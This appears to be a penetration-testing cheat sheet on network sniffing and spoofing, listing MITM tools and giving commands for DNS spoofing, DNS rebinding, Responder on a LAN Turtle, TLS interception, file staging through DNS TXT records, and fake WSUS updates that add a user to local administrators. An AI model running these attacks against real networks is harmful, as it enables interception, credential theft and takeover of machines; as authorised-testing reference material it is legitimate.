Skip to content

Latest commit

 

History

History
444 lines (321 loc) · 11.7 KB

File metadata and controls

444 lines (321 loc) · 11.7 KB

Sniffing & Spoofing

Table of Contents

Resources

Name Description URL
DNSChef DNSChef - DNS proxy for Penetration Testers and Malware Analysts https://github.com/iphelix/dnschef
DNSChef (NG) DNSChef (NG) - DNS proxy for Penetration Testers and Malware Analysts https://github.com/byt3bl33d3r/dnschef-ng
FakeDns A regular-expression based python MITM DNS server with support for DNS Rebinding attacks https://github.com/Crypt0s/FakeDns
FakeSSH A dockerized fake SSH server honeypot written in Go that logs login attempts. https://github.com/fffaraz/fakessh
InterceptSuite MITM proxy for TCP/TLS/DTLS/UDP traffic, with support for TLS upgrades like STARTTLS, PostgreSQL, and more. https://github.com/InterceptSuite/InterceptSuite
mDNS A mDNS sniffer and interpreter. https://github.com/eldraco/Sapito
mitm6 mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. https://github.com/dirkjanm/mitm6
mitmproxy mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets. https://github.com/mitmproxy/mitmproxy
PyWSUS Standalone implementation of a part of the WSUS spec. Built for offensive security purposes. https://github.com/GoSecure/pywsus
Responder IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay. https://github.com/lgandx/Responder
SharpWSUS SharpWSUS is a CSharp tool for lateral movement through WSUS. https://github.com/nettitude/SharpWSUS
SSH-MITM ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation https://github.com/ssh-mitm/ssh-mitm
wsuks Automating the MITM attack on WSUS https://github.com/NeffIsBack/wsuks

DNSChef

https://github.com/iphelix/dnschef

Configuration File Example

dnschef.ini

[A]     # Queries for IPv4 address records
*.thesprawl.org=192.0.2.1

[AAAA]  # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1

[MX]    # Queries for mail server records
*.thesprawl.org=mail.fake.com

[NS]    # Queries for mail server records
*.thesprawl.org=ns.fake.com

[CNAME] # Queries for alias records
*.thesprawl.org=www.fake.com

[TXT]   # Queries for text records
*.thesprawl.org=fake message

[PTR]
*.2.0.192.in-addr.arpa=fake.com

[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600

[NAPTR]
; FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .

[SRV]
; FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com

[DNSKEY]
; FORMAT: flags protocol algorithm base64(key)
*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==

[RRSIG]
; FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=

Start DNSChef using the Configuration File

$ sudo dnschef --file dnschef.ini

or

$ dnschef --interface <LHOST> --port 53 --tcp --file dnschef.ini

Using bloodhound-python with DNSChef

$ proxychains bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<LHOST>' -c all --zip --dns-tcp --dns-timeout 30
$ proxychains bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<LHOST>' -c all --zip --dns-tcp --dns-timeout 300 --disable-pooling -w 1

DNSChef (NG)

https://github.com/byt3bl33d3r/dnschef-ng

Installation

$ pipx install dnschef-ng

Common Commands

$ dnschef-ng -6
$ dnschef-ng --fakeip 127.0.0.1 -q
$ dnschef-ng --fakeip 127.0.0.1 --fakeipv6 ::1 -q
$ dnschef-ng --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.<DOMAIN> --fakealias www.<DOMAIN> --fakens ns.<DOMAIN> -q

Definitions File

dnschef.toml

[A]
"<RHOST>"="<IP_ADDRESS>"

[NS]
"*.<DOMAIN>"="<RHOST>"

[PTR]
"*.1.1.192.in-addr.arpa"="<DOMAIN>"

Start DNSChef (NG) using Definitions File

$ dnschef-ng --file dnschef.toml -q

File Staging

[A]
"*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 4 }

[AAAA]
"*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 16 }

[TXT]
"ns*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 189, response_format = "{prefix}test-{chunk}", response_prefix_pool = ["atlassian-domain-verification=", "onetrust-domain-verification=", "docusign=" ] }

FakeDns

https://github.com/Crypt0s/FakeDns

DNS Rebind Attack

$ cat fake.conf
A <DOMAIN> 127.0.0.1 1%<LHOST>

Start the Server

$ sudo python3 fakedns.py -c fake.conf --rebind

Test

nslookup > server <LHOST>
Default server: <LHOST>
Address: <LHOST>#53
> <FAKE_DOMAIN>
Server:         <LHOST>
Address:        <LHOST>#53

Name:   <FAKE_DOMAIN>
Address: 127.0.0.1
*## server can't find <FAKE_DOMAIN>: NXDOMAIN
> <FAKE_DOMAIN>
Server:         <LHOST>
Address:        <LHOST>#53

Name:   <FAKE_DOMAIN>
Address: <LHOST>
*## server can't find <FAKE_DOMAIN>: NXDOMAIN
>

fakessh

https://github.com/fffaraz/fakessh

$ go install github.com/fffaraz/fakessh@latest
$ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
$ ./fakessh 

Hak5 LAN Turtle

https://github.com/hak5/lanturtle-modules

http://downloads.openwrt.org/releases/packages-19.07/mips_24kc/packages/gcc_7.4.0-5_mips_24kc.ipk

https://github.com/lgandx/Responder/archive/refs/heads/master.zip

FixIt to UseIt

Connect

$ ip a / ifconfig / ipconfig    // have a look for 172.16.84.1
$ ssh root@172.16.84.1          // default password: sh3llz
$ Ctrl+c                        // get to root SSH session

Network Configuration

$ vim /etc/network/config
config interface 'wan'
		option ifname 'eth1'
		option proto 'dhcp'
		option metric '20'
		option ipv6 '0'
$ /etc/init.d/network restart

SD Card Information

$ cat /etc/opkg.conf
dest root /
dest ram /tmp
dest sd /sd

Responder Installation

Prerequisites

The exports should go to the .bashrc to make it persistent.

$ opkg install python3 --dest sd
$ export LD_LIBRARY_PATH="/sd/usr/lib:/usr/lib"
$ opkg install python3-pip --dest sd
$ export PATH="/sd/usr/bin:$PATH"
$ mkdir /sd/python3-modules
$ export PYTHONHOME="/sd/usr/"
$ export PYTHONPATH="/sd/python3-modules"
$ python3 -m pip install setuptools --target=/sd/python3-modules
$ python3 -m pip install wheel --target=/sd/python3-modules
$ wget http://downloads.openwrt.org/releases/packages-19.07/mips_24kc/packages/gcc_7.4.0-5_mips_24kc.ipk
$ scp gcc_7.4.0-5_mips_24kc.ipk root@172.16.84.1:/sd/gcc_7.4.0-5_mips_24kc.ipk
$ opkg install gcc_7.4.0-5_mips_24kc.ipk --dest sd
$ opkg install libffi --dest sd
$ opkg install python3-dev --dest sd
$ export CFLAGS="-I/sd/usr/include/bits/ -I/sd/usr/include/ -I/sd/usr/include/linux/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/install-tools/include/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/include-fixed/"
$ export CFLAGS="-I/sd/usr/include/"
$ python3 -m pip install netifaces --target=/sd/python3-modules
Exports
$ export LD_LIBRARY_PATH="/sd/usr/lib:/usr/lib"
$ export PATH="/sd/usr/bin:$PATH"
$ export PYTHONHOME="/sd/usr/"
$ export PYTHONPATH="/sd/python3-modules"
$ export CFLAGS="-I/sd/usr/include/bits/ -I/sd/usr/include/ -I/sd/usr/include/linux/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/install-tools/include/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/include-fixed/"
$ export CFLAGS="-I/sd/usr/include/"
Download Responder
$ cd /sd
$ wget https://github.com/lgandx/Responder/archive/refs/heads/master.zip
$ opkg install unzip --dest sd
$ unzip responder.zip
$ mv Responder-master Responder
Certificate Creation
/sd/Responder/certs
#!/bin/bash
openssl genrsa out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"

Create the certificates locally and copy it to the LAN Turtle before you start Responder.

mitmproxy

SSL Certificate Configuration

Prepare SSL Certificate

$ openssl genrsa -out <FILE>.key 2048
$ openssl req -new -key <FILE>.key -out <FILE>.csr -subj "/CN=<DOMAIN>"
$ openssl x509 -req -in <FILE>.csr -CA RootCA.crt -CAkey RootCA.key -CAcreateserial -out <FILE>.crt -days 365
$ cat <FILE>.key <FILE>.crt > <FILE>.pem

Execution

$ mitmproxy --mode reverse:https://<RHOST> --certs <FILE>.pem --save-stream-file <FILE>.raw -k -p 443

PyWSUS

Prerequisites

Generate Virtual Environment

$ python3 -m virtualenv venv
$ source venv/bin/activate

Update and install required Packages and Libraries

$ sudo apt install libxml2-dev libxslt1-dev python3-dev -y
$ sed -i 's/lxml==4.6.2/lxml==5.3.0/' requirements.txt
$ pip install -r requirements.txt

Fetch and Apply Pull Request to support encrypted Communication

$ git fetch origin pull/18/head:pr18
$ git checkout pr18
$ sed -i "s/    parser.add_argument('-v', '--verbose'/    parser.add_argument('--cert', default=None, help='Path to SSL certificate.')\n    parser.add_argument('--key', default=None, help='Path to SSL private key.')\n    parser.add_argument('-v', '--verbose'/" pywsus.py
$ sed -i 's/def run(host, port, server_class=HTTPServer, handler_class=WSUSBaseServer):/def run(host, port, cert=None, key=None, server_class=HTTPServer, handler_class=WSUSBaseServer):/' pywsus.py
$ sed -i 's/    httpd = server_class(server_address, handler_class)/    httpd = server_class(server_address, handler_class)\n    if cert and key:\n        import ssl\n        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n        ctx.load_cert_chain(certfile=cert, keyfile=key)\n        httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)/' pywsus.py
$ sed -i 's/    run(host=args.host, port=args.port)/    run(host=args.host, port=args.port, cert=args.cert, key=args.key)/' pywsus.py

Execution

$ python3 pywsus.py -H <RHOST> -p 8531 -e PsExec64.exe -c '-accepteula -s cmd.exe /c net localgroup administrators <USERNAME> /add' --cert <FILE>.crt --key <FILE>.key

Responder

https://github.com/lgandx/Responder

$ sudo responder -I <INTERFACE>

SSH-MITM

$ ssh-mitm server
$ ssh-mitm server --remote-host <RHOST>
$ socat TCP-LISTEN:<RPORT>,fork TCP:127.0.0.1:10022

tshark

Capturing SMTP Traffic

$ tshark -i <INTERFACE> -Y 'smtp.data.fragments' -T fields -e 'text'

Analyzing PCAP File

$ tshark --Y http.request -T fields -e http.host -e http.user_agent -r <FILE>.pcap

wsuks

$ sudo wsuks --serve-only --tls-cert <FILE>.pem -e PsExec64.exe -c '-accepteula -s cmd.exe /c net localgroup administrators <USERNAME> /add' -I <INTERFACE>